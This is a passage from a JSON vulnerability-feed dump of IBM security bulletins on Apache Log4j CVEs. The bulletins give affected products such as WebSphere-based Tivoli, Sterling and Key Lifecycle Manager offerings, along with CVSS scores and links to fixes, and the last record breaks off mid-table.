"AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-03-16T23:45:11", "description": "## Summary\n\nVulnerabilities in Apache Log4j (CVE-2021-4104, CVE-2021-45046) impact IBM WebSphere Application Server shipped with IBM Security Access Manager for Enterprise Single Sign-On. The fix addresses the vulnerabilities by removing Apache Log4j.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Security Access Manager for Enterprise Single-Sign On| 8.2.0, 8.2.1, 8.2.2 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\n**Principal Product and Version(s)**| **Affected Supporting Product and Version**| **Affected Supporting Product Security Bulletin** \n---|---|--- \nIBM Security Access Manager for Enterprise Single Sign-On 8.2.0| IBM WebSphere Application Server 7.0| [Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty \\(CVE-2021-4104, CVE-2021-45046\\)\" ) \nIBM Security Access Manager for Enterprise Single Sign-On 8.2.1| IBM WebSphere Application Server 7.0, 8.5| [Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty \\(CVE-2021-4104, CVE-2021-45046\\)\" ) \nIBM Security Access Manager for Enterprise Single Sign-On 8.2.2| IBM WebSphere Application Server 8.5| [Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty \\(CVE-2021-4104, CVE-2021-45046\\)\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n08 Mar 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS9JLE\",\"label\":\"IBM Security Access Manager for Enterprise Single Sign-On\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"8.2.0, 8.2.1, 8.2.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-16T03:25:30", "type": "ibm", "title": "Security Bulletin: IBM Security Access Manager for Enterprise Single Sign-On is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-4104, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-45046"], "modified": "2022-03-16T03:25:30", "id": "30A0E9F889B3548B9BD0339A7DD9F4F3D51821FE906234D247C17BB05B831873", "href": "https://www.ibm.com/support/pages/node/6563859", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-03-18T23:36:20", "description": "## Summary\n\nIBM WebSphere Application Server is a required product for IBM Tivoli Netcool Configuration Manager version 6.4.2. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nITNCM| 6.4.2 \n \n\n\n## Remediation/Fixes\n\nAffected Product(s)| Version(s)| Remediation \n---|---|--- \nITNCM| 6.4.2| \n\n[Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty](<https://www.ibm.com/support/pages/node/6526750> \"Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty\" )\n\nSee section: For V9.0.0.0 through 9.0.5.10 :\n\nSee section: For V8.5.0.0 through 8.5.5.20 :\n\nSee section: For V8.0.0.0 through 8.0.0.15 :\n\nSee section: For V7.0.0.0 through 7.0.0.45 : \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n31 Dec 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS7UH9\",\"label\":\"Tivoli Netcool Configuration Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"}],\"Version\":\"6.4.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {}, "published": "2022-01-13T05:23:19", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server, which is a required product for IBM Tivoli Netcool Configuration Manager (CVE-2021-4104, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-45046"], "modified": "2022-01-13T05:23:19", "id": "D9425756DF631BB7CA03B3451BD1F9C557325B8A2BB0CD34A22102962A0F4213", "href": "https://www.ibm.com/support/pages/node/6540524", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-25T23:39:30", "description": "## Summary\n\nIBM Sterling External Authentication Server is vulnerable to an arbitrary code execution due to Apache Log4j, which is used for logging (CVE-2021-44832). The fix upgrades all Apache Log4j 1.x to Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling External Authentication Server| 6.0.3 \nIBM Sterling External Authentication Server| 6.0.2 \nIBM Sterling External Authentication Server| 2.4.3.2 \n \n\n\n## Remediation/Fixes\n\nProduct| VRMF| iFix| Remediation \n---|---|---|--- \nIBM Sterling External Authentication Server| 6.0.3| iFix 01 Plus Build 141| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Sterling External Authentication Server| 6.0.2| iFix 04 Plus Build 214| [Fix Central - 6020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \nIBM Sterling External Authentication Server| 2.4.3.2| iFix 13 Plus Build 296| [Fix Central - 2432](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=2.4.3.2&platform=All&function=all> \"Fix Central - 2432\" ) \nThis fix also remediates CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832. \n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n07 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6PNW\",\"label\":\"IBM Sterling Secure Proxy\"},\"Component\":\"Sterling External Authentication Server\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"}],\"Version\":\"6.0.3, 6.0.2, 2.4.3.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T19:03:49", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability affects IBM Secure External Authentication Server (CVE-2021-4104)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-07T19:03:49", "id": "B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", "href": "https://www.ibm.com/support/pages/node/6538954", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "## Summary\n\nThe following security issue has been identified in components related to IBM Tivoli Monitoring (ITM) portal server and client. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Monitoring| 6.3.0 \n \n## Remediation/Fixes\n\nIn addition to the CVE in this bulletin the following are also addressed by the WebSphere patch below:\n\n[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>), [CVE-2021-45105](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>), [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)\n\n \nFix Name| VRMF| Remediation/Fix Download \n---|---|--- \n6.3.0.7-TIV-ITM-SP0010| 6.3.0.7 Fix Pack 7 Service Pack 10| <https://www.ibm.com/support/pages/node/6550868> \n6.X.X-TIV-ITM_TEPS_WAS-IHS_ALL_8.55.20.02| 6.3.0.7 Fix Pack 7 Service Pack 5 or later| <https://www.ibm.com/support/pages/node/6538128> \n \n## Workarounds and Mitigations\n\nNone of the vulnerable instances of log4j are actually used by ITM. If enabled, the IBM Tivoli Monitoring dashboard data provider may be using log4j client libraries which are not the actual log4j core function. Note all versions of log4j components are only installed if you've installed one of the following components:\n\ncj Tivoli Enterprise Portal Desktop Client \ncw Tivoli Enterprise Portal Browser Client \ncq Tivoli Enterprise Portal Server \n\nThe provided remediation will safely remove or update all vulnerable instances of log4j.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n31 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSZ8F3\",\"label\":\"IBM Tivoli Monitoring V6\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"}],\"Version\":\"6.3.0.7\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-31T20:11:37", "type": "ibm", "title": "Security Bulletin: Vulnerablity in Apache Log4j may affect IBM Tivoli Monitoring (CVE-2021-4104)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-31T20:11:37", "id": "08803B708D4CA95FF8DD68A4DE7FBE7DEAA67387194E25D8CD693B135E7332D9", "href": "https://www.ibm.com/support/pages/node/6551452", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-13T23:45:08", "description": "## Summary\n\nThere are multiple vulnerabilities in Log4j used by IBM Content Integrator. IBM Content Integrator is not affected by these vulnerabilities. However, the team has addressed vulnerabilities by removing references.\n\n## Vulnerability Details\n\n**CVEID: CVE-2021-44228** \nDESCRIPTION: Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure \nto protect against attacker-controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially \ncrafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take \ncomplete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/214921 for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n**CVEID: CVE-2021-45046** \nDESCRIPTION: Apache Log4j could result in remote code execution, caused by an incomplete fix \nof CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default \nPattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft \nmalicious input data using a JNDI Lookup pattern to leak sensitive \ninformation and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/215195 for the current score. \nCVSS Vector: Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\n\n**CVEID: CVE-2021-45105** \nDESCRIPTION: Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled \nrecursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could \ncraft malicious input data that contains a recursive lookup to cause a StackOverflowError \nthat will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/215647 for the current score. \nCVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H\n\n**CVEID: CVE-2021-4104** \nDESCRIPTION: Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the \ndeserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to \nuse JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/215048 for the current score. \nCVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\n\n**CVEID: CVE-2021-38951** \nDESCRIPTION: IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 is vulnerable to a denial of service, \ncaused by sending a specially-crafted request. A remote attacker could exploit this vulnerability to \ncause the server to consume all available CPU resources. IBM X-Force ID: 211405. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/211405 for the current score. \nCVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM Content Integrator | 8.6 \n \n## Remediation/Fixes\n\nIBM Content Integrator 8.6.0.4 IF0009 [Fix Central](<https://www.ibm.com/support/fixcentral/swg/doSelectFixes?options.selectedFixes=ICI_8604-IF0009&continue=1> \"Fix Central\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n5 May 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Type\":\"MASTER\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSWLLY\",\"label\":\"Content Integrator\"},\"ARM Category\":[{\"code\":\"a8m0z000000cwNnAAI\",\"label\":\"Content Integrator\"}],\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-05T14:49:44", "type": "ibm", "title": "Security Bulletin: IBM Content Integrator is not affected by multiple vulnerabilities in Log4j", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38951", "CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-05-05T14:49:44", "id": "AD5C7F7150FBD846C587F5FAD0D7C7B48F81990F52A351F824E5CBBBAC83F163", "href": "https://www.ibm.com/support/pages/node/6582359", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-13T23:48:42", "description": "## Summary\n\nWebSphere Application Server (WAS) is shipped as a component of IBM Security Guardium Key Lifecycle Manager (GKLM). Information about the Apache Log4j vulnerability has been published in a security bulletin. Customers are encouraged to take quick action to update their systems.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n\n\n**DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam.\n\n \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| \n\n**Affected Supporting Product and Version(s)** \n \n---|--- \nIBM Security Key Lifecycle Manager (SKLM) v2.7** [EOS] | WebSphere Application Server v9.0.0.1 \nIBM Security Key Lifecycle Manager (SKLM) v3.0 | WebSphere Application Server v9.0.0.5 \nIBM Security Key Lifecycle Manager (SKLM) v3.0.1 | WebSphere Application Server v9.0.0.5 \nIBM Security Key Lifecycle Manager (SKLM) v4.0 | WebSphere Application Server v9.0.5.0 \nIBM Security Guardium Key Lifecycle Manager (GKLM) v4.1 | WebSphere Application Server v9.0.5.5 \nIBM Security Guardium Key Lifecycle Manager (GKLM) v4.1.1 | WebSphere Application Server Liberty 21.0.0.6 \n 